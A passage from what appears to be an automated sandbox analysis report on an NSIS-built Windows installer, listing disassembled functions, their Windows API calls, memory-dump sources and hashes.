                                                                                                                                                                                                                                                                              • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                            • String ID: F$A
                                                                                                                                                                                                                                                                            • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                            • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                            • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                            Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                            • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                            • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                            • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                            Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                            • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                            • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                            • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                            Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                              • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                            • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                            • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                            • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                            Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                            • String ID: F$N$open
                                                                                                                                                                                                                                                                            • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                            • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                            • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                            Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                            • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                            • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                            • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                            • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                            • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                            • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                            • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                            Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
